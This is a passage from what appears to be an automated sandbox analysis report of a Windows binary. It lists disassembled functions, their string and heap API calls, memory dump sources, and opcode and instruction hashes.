                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: e8103a793ba7fed44e4ee5bb73affebb027dc9289d624302d1d042f750d91e38
                                  • Instruction ID: b938b4f5c6ae6300d3e874e2158c86092b4312fe16611be97305eb59d0586a47
                                  • Opcode Fuzzy Hash: e8103a793ba7fed44e4ee5bb73affebb027dc9289d624302d1d042f750d91e38
                                  • Instruction Fuzzy Hash: 8712FD70A212028FDB28CF19C554B25B7E5BF44718B29C6ADE809DB3A2D772DD52CF44
                                  Function 002C7C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002C7CAF
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D58
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D76
                                    • Part of subcall function 002C7D40: std::_Xinvalid_argument.LIBCPMT ref: 002C7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 2a24f1743baee6cfb4ee219448e9710628ec179b3a09409051b928febd00ff2d
                                  • Instruction ID: 700a71e67ebb86ef8af4f703eaa4ac5c4bd5f7984295e037e27adb6ac5090297
                                  • Opcode Fuzzy Hash: 2a24f1743baee6cfb4ee219448e9710628ec179b3a09409051b928febd00ff2d
                                  • Instruction Fuzzy Hash: 273109723282128BD724DD6CE880F6AF7E9EF91750B20472FF446CB641C7719D608BA4
                                  Function 002B6EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 002B6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: 1538a907878f6df5fc7a1109ba192fdaf0f50265d857d7727ad2ec9dd321e71f
                                  • Instruction ID: f31477cfdbeb7c57caaeafbeaeaf7a6efb01c0f2a2fac1817a0be3cc8f3a7299
                                  • Opcode Fuzzy Hash: 1538a907878f6df5fc7a1109ba192fdaf0f50265d857d7727ad2ec9dd321e71f
                                  • Instruction Fuzzy Hash: 99218EB06106029BEB20CF20DC88BB673E9EB44745F44487CF946CBA85F7B9E955C750
                                  Function 002D2400 Relevance: 5.2, APIs: 4, Instructions: 234stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002D244C
                                  • lstrlen.KERNEL32(00000000), ref: 002D24E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002D2570
                                  • lstrlen.KERNEL32(00000000), ref: 002D2577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 43dd708a948227c2cd6f3a26bb081ee99104a2e8b216fdc3310245a57ec001ce
                                  • Instruction ID: 1f774753a2d1424ec263a032e921510acef715171c68aa2c4f1b3dfaaa86e84e
                                  • Opcode Fuzzy Hash: 43dd708a948227c2cd6f3a26bb081ee99104a2e8b216fdc3310245a57ec001ce
                                  • Instruction Fuzzy Hash: 3381A471E10306DBDB14DF94DC84BAEB7B9AF94300F2480AAE908A7381E7759D59CF94
                                  Function 002B1530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000), ref: 002B162D
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B164F
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B1671
                                    • Part of subcall function 002B1610: lstrcpy.KERNEL32(00000000,?), ref: 002B1693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B15FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 8ffb40a288297a8c8a4396f1933432a61d804c171ea62e1f06f1b0f9c7ddd933
                                  • Instruction ID: b08e184c9f78d5176e359fff7d1f5d16e4d049037a3032dc7fc10500e054c301
                                  • Opcode Fuzzy Hash: 8ffb40a288297a8c8a4396f1933432a61d804c171ea62e1f06f1b0f9c7ddd933
                                  • Instruction Fuzzy Hash: D231C374A21B429FD724DF3AC5989A2BBE5BF88340740492DA896C3B50DB30F821CF80
                                  Function 002D1570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002D15A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D15D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002D1649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: d48351b77441261e69acb424ce845eb4ab0a23f4729d26215a128e83eac484ef
                                  • Instruction ID: 6cdbd749388c61a394e4a079e069ed8d51b25024bee16264924eb1e421bebc87
                                  • Opcode Fuzzy Hash: d48351b77441261e69acb424ce845eb4ab0a23f4729d26215a128e83eac484ef
                                  • Instruction Fuzzy Hash: CE211874621B039BD724DF2AD454A27B7F8AF44340B14491DA486C7B40DB34EC65CF90
                                  Function 002B1610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 002B162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B1693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 70304fdbb08cdeda61380d9abe795362636e108e9982b0518cc397d5184b2ba4
                                  • Instruction ID: 40cea6e939b5458ecd1801aad8bb554b966bd4d89cb9ef0f64e830cdb3390c8d
                                  • Opcode Fuzzy Hash: 70304fdbb08cdeda61380d9abe795362636e108e9982b0518cc397d5184b2ba4
                                  • Instruction Fuzzy Hash: 07115E74A21B039BEB249F35D558966B7FCBF44381748452DA89AC7B40EB30E821CF90